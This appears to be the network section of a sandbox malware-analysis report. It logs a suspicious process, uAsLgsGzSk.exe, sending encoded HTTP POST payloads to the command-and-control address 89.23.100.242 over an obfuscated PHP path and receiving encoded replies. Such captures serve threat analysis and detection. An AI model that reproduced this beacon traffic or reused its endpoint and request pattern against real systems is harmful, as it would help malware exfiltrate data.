                                                                                                Jan 10, 2025 07:59:12.944700003 CET805012189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:12.985918999 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.059009075 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.065212011 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.065287113 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.065357924 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.070949078 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.423511028 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.428926945 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.428963900 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.428996086 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.819375038 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:13.860941887 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:13.956799030 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.001568079 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.074270964 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.074528933 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.079535007 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.079627991 CET805012289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.079669952 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.079705954 CET5012280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.079814911 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.084670067 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.439152956 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.444458961 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.444499016 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.444531918 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.823292017 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:14.876564980 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:14.974802971 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.017185926 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.085546017 CET5012180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.089278936 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.089427948 CET5012480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.094383001 CET805012389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.094424009 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.094445944 CET5012380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.094487906 CET5012480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.094574928 CET5012480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.099389076 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.439156055 CET5012480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:15.444575071 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.444613934 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.444645882 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:15.958376884 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:16.001564026 CET5012480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:16.088973045 CET805012489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:16.142178059 CET5012480192.168.2.489.23.100.242

                                                                                                HTTP Request Dependency Graph

                                                                                                • 89.23.100.242

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.44973689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:30.531393051 CET530OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 344
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:30.877572060 CET344OUTData Raw: 00 04 04 07 06 00 01 04 05 06 02 01 02 0d 01 07 00 06 05 00 02 0d 03 0e 02 0e 0d 07 04 07 02 01 0a 01 07 00 07 03 04 56 0e 53 04 00 07 04 06 56 06 0b 0e 5d 0f 00 01 04 04 0f 04 57 06 51 07 0c 00 0a 0c 0b 00 04 06 55 0e 52 0d 03 0e 01 0f 09 07 01
                                                                                                Data Ascii: VSV]WQUR]W\L~h^zt[~\welOhReO`ltL|ZhKlop_l^r|htg]\j_~V@{}bbi
                                                                                                Jan 10, 2025 07:57:31.274888992 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:31.379204035 CET1236INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 35 36 63 0d 0a 56 4a 7e 06 78 53 63 02 6c 72 78 05 7c 4f 55 4a 7e 77 73 41 7c 4e 65 0c 7b 73 63 5e 7d 4c 74 05 60 5d 71 08 6d 5f 71 49 61 48 55 58 7d 5b 78 01 55 4b 71 0c 60 61 7b 06 68 71 69 00 68 74 61 53 79 66 70 08 6a 60 64 5d 62 72 7d 03 63 61 7d 47 7e 61 57 5a 6a 6c 64 08 69 59 70 5b 62 5c 7b 06 7c 5b 6d 03 69 60 76 58 6c 77 5e 43 6f 67 5e 04 7b 43 6b 49 79 4c 70 03 6c 5d 76 03 7c 59 7f 58 6f 59 5d 5e 69 61 6f 40 62 61 59 5b 7a 51 41 5b 7f 59 77 54 7f 4f 6d 4e 77 7c 7b 5b 7b 6f 6b 59 74 5e 72 0d 7b 61 5f 02 69 6c 50 02 7b 61 58 49 77 70 60 5b 76 5f 70 41 77 4f 72 50 7e 5d 79 5f 77 4c 6d 04 61 65 55 50 7f 6c 66 5c 77 6f 6c 04 7c 70 7c 01 78 6f 7f 03 6f 59 76 00 6b 6d 68 08 74 64 7c 05 7e 62 71 50 69 6e 64 52 78 6e 79 5e 7e 71 62 5a 7b 5d 46 51 7c 7f 6b 52 7f 60 67 52 6a 01 7a 07 7a 7d 68 59 7b 5c 7b 5d 7f 72 63 07 7e 64 7b 08 68 5e 66 51 6d 4d 7c 07 7f 62 51 5b 74 73 71 51 7b 5c 79 00 76 76 5a 4b 7c 76 68 4d 7d 48 6d 09 74 4c 67 4a 7c 5c 69 42 7f 49 76 0a 7b 58 60 09 7e 5d 7b 47 75 72 7d 4f 74 [TRUNCATED]
                                                                                                Data Ascii: 56cVJ~xSclrx|OUJ~wsA|Ne{sc^}Lt`]qm_qIaHUX}[xUKq`a{hqihtaSyfpj`d]br}ca}G~aWZjldiYp[b\{|[mi`vXlw^Cog^{CkIyLpl]v|YXoY]^iao@baY[zQA[YwTOmNw|{[{okYt^r{a_ilP{aXIwp`[v_pAwOrP~]y_wLmaeUPlf\wol|p|xooYvkmhtd|~bqPindRxny^~qbZ{]FQ|kR`gRjzz}hY{\{]rc~d{h^fQmM|bQ[tsqQ{\yvvZK|vhM}HmtLgJ|\iBIv{X`~]{Gur}OtOm_j|d@}gQDuak{rmI}N_ywZMyg^{mgxblx]fNl{YVJ}\svap||]Ew`O|amCvlh{BdKtNrNyaq~|Pzazuc]Iv_dvab@p~MtLiwe^BStlRc`y|Q{pfD|}|Ntwt}Lb~mU@xSz}LS|NZBpN}^xB~wrCx}c{bpqg}ws|NqO{c`}rtvsq@zOyuHp|ft}f}vrwba|gfxf`|sGuLut_q~az~|l}IQKwagI{\}}`_xg^{wtxS{zr^x]~{]NZoxD}rswb{[j`[^`Oh_bSvU|xBY\tYz@ma_Ji|~_z\y\}b`g{ZL~JxYi\tq}vexARuwU|]sZxl_{`vtthjazzSYQa~CjrAPsIBQoAPilTjkyWT|wlaRXt@et`LRsAmosy_BXt`i@ya\XuXZ~X{_j_bQvr{|rqO|weRxfwSi`tXau_v[KYkeGSMj^F`x\Vnn\PiZyZpzYhzSwHzOIzs\_~ws]ldDQ~`YYbVjZW`x{^U\A{lW{Cp]@PnbFPKo_D`|_bY@[\~x_[]OzoZsJxQG\coCRpAlZGmy_hUO[Xw@jqbQ|P|wbj~ [TRUNCATED]
                                                                                                Jan 10, 2025 07:57:31.379251003 CET350INData Raw: 72 5c 4e 57 5a 4a 5c 7c 75 7f 5f 63 60 09 4f 56 7d 66 5d 59 65 04 54 6a 00 08 06 52 5c 6a 41 5c 63 7c 45 68 71 65 5c 7d 5a 79 6f 63 4b 70 4b 7a 5a 56 5c 5a 05 7a 45 5d 62 5c 40 53 59 0a 5b 52 0b 63 4c 54 7b 78 06 6c 58 74 44 6f 65 71 06 7a 58 6e
                                                                                                Data Ascii: r\NWZJ\|u_c`OV}f]YeTjR\jA\c|Ehqe\}ZyocKpKzZV\ZzE]b\@SY[RcLT{xlXtDoeqzXnFWkkXlp{aR~tmnxXyt}XhcDT{c]RaQaEWZGhdcRbkp|Ssp]@PnbFPKo_D`xEZ[gF[XaLUq_[am\wXswSzX{{wS`oJWoxZ|]DZhoOZtAj[MkNPQ~[Tab[{^^Q||xL~NtA~J~G|TV_
                                                                                                Jan 10, 2025 07:57:31.429939985 CET506OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 384
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:31.670556068 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:31.670717001 CET384OUTData Raw: 59 57 43 53 5e 5e 53 57 58 5b 57 56 50 5d 5b 5b 55 56 5e 58 54 5e 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YWCS^^SWX[WVP][[UV^XT^Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/1/[?=?\/+.#(^4]!4?T(U7=<>F%.(Y&*'_!/Y.1
                                                                                                Jan 10, 2025 07:57:31.931037903 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 11 23 05 0d 0c 24 3c 2d 53 2e 2f 3e 0e 2b 56 23 01 3e 13 38 07 3e 30 2f 54 39 2c 20 0e 22 28 3a 05 3c 0c 36 56 24 12 2c 53 27 27 21 59 0c 13 25 00 3d 3a 32 09 2a 04 05 07 3c 21 2e 40 26 23 2c 03 25 3d 3e 0a 23 2c 2c 17 3f 14 39 52 2b 31 0b 52 2d 29 2c 5f 3d 3c 0e 11 27 1c 2a 57 0c 1f 26 10 36 32 31 1c 21 54 29 02 27 38 09 10 33 16 34 1d 32 59 34 03 37 3a 28 00 3a 07 20 58 22 00 0a 5b 2a 10 32 56 36 0c 30 19 3f 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#$<-S./>+V#>8>0/T9, "(:<6V$,S''!Y%=:2*<!.@&#,%=>#,,?9R+1R-),_=<'*W&621!T)'8342Y47:(: X"[*2V60? Q""P0]Q0
                                                                                                Jan 10, 2025 07:57:31.952721119 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 1820
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:32.194262981 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:32.194561958 CET1820OUTData Raw: 5c 55 46 52 5e 5e 56 51 58 5b 57 56 50 58 5b 53 55 54 5e 52 54 5d 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UFR^^VQX[WVPX[SUT^RT]QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;>=2<5(\;-R<+^<X"$#(/=<!1-0'_!/Y.%
                                                                                                Jan 10, 2025 07:57:32.441204071 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 11 23 3b 2c 53 26 3f 21 55 39 2f 39 53 2b 20 37 01 3d 04 38 06 29 55 23 10 2e 06 3f 57 35 2b 0b 5d 2b 0c 26 51 30 02 34 1f 26 27 21 59 0c 13 26 12 3c 29 3d 1c 29 2a 38 12 3c 08 22 08 27 55 3f 5e 30 3d 00 09 34 3f 38 17 3c 2a 26 08 3f 0f 2d 52 2e 39 38 15 2a 2f 20 1f 33 36 2a 57 0c 1f 25 0b 35 1c 39 1e 22 31 21 00 30 2b 2b 53 24 16 28 56 24 2f 37 10 20 3a 3c 02 2e 17 09 02 35 07 24 5f 3e 00 2a 1f 35 1c 27 0a 2b 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#;,S&?!U9/9S+ 7=8)U#.?W5+]+&Q04&'!Y&<)=)*8<"'U?^0=4?8<*&?-R.98*/ 36*W%59"1!0++S$(V$/7 :<.5$_>*5'+ Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.44973789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:31.519287109 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:31.876787901 CET2544OUTData Raw: 59 53 46 55 5b 5e 56 54 58 5b 57 56 50 58 5b 51 55 57 5e 5e 54 5e 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSFU[^VTX[WVPX[QUW^^T^QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B;2/(>-+&Z;:%+-+?$5$?U(3X+?6A%4$'_!/Y.%
                                                                                                Jan 10, 2025 07:57:32.255752087 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:32.408117056 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.44973889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:32.606549025 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:32.956928015 CET2544OUTData Raw: 5c 55 46 57 5b 5c 56 50 58 5b 57 56 50 5d 5b 53 55 52 5e 5b 54 5d 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UFW[\VPX[WVP][SUR^[T]QSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;<=<,Y/)U(;(($["4+ 0)/6A2[(X&*'_!/Y.1
                                                                                                Jan 10, 2025 07:57:33.361191988 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:33.496560097 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.44973989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:33.496103048 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2020
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:33.845182896 CET2020OUTData Raw: 5c 54 43 53 5b 5e 53 52 58 5b 57 56 50 5b 5b 50 55 51 5e 5b 54 5a 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TCS[^SRX[WVP[[PUQ^[TZQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E81'X<9?P([,1>=,X+(\"#(U?X>?9&[8\''_!/Y.%
                                                                                                Jan 10, 2025 07:57:34.259073019 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:34.394682884 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 3a 0f 37 02 28 11 31 3c 29 54 39 01 03 19 28 33 3b 06 2a 3d 3b 5b 2a 33 2b 57 2d 3f 2b 57 36 05 29 15 28 22 3d 09 27 5a 30 54 25 37 21 59 0c 13 26 5b 2b 14 2a 08 3e 04 28 59 3c 21 21 18 27 23 20 02 27 3e 22 0a 20 2f 2b 04 28 03 2e 0b 28 32 3e 0f 2e 29 20 18 29 3c 30 57 27 1c 2a 57 0c 1f 26 1d 35 32 31 56 22 31 3a 5c 33 06 2f 55 25 3b 3f 0f 31 2f 27 5d 20 29 3b 59 3a 3a 24 5d 21 2e 05 06 29 3e 2a 56 35 31 37 09 28 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:7(1<)T9(3;*=;[*3+W-?+W6)("='Z0T%7!Y&[+*>(Y<!!'# '>" /+(.(2>.) )<0W'*W&521V"1:\3/U%;?1/'] );Y::$]!.)>*V517( Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.44974089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:33.686378002 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:34.032778978 CET2544OUTData Raw: 59 53 43 50 5e 5c 53 54 58 5b 57 56 50 53 5b 56 55 55 5e 59 54 5a 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSCP^\STX[WVPS[VUU^YTZQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;"3>=2+5?/!S>=+84"$#(07Z>?& _0:'_!/Y.
                                                                                                Jan 10, 2025 07:57:34.450289965 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:34.586520910 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.44974389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:34.840650082 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:35.189908981 CET2544OUTData Raw: 59 55 43 56 5b 5a 56 51 58 5b 57 56 50 53 5b 53 55 52 5e 5c 54 59 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUCV[ZVQX[WVPS[SUR^\TYQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C;1+]>=9[<%<]8*:>=(_+++#';<3?Y)/%['':'_!/Y.
                                                                                                Jan 10, 2025 07:57:35.573590040 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:35.725929022 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:35 GMT
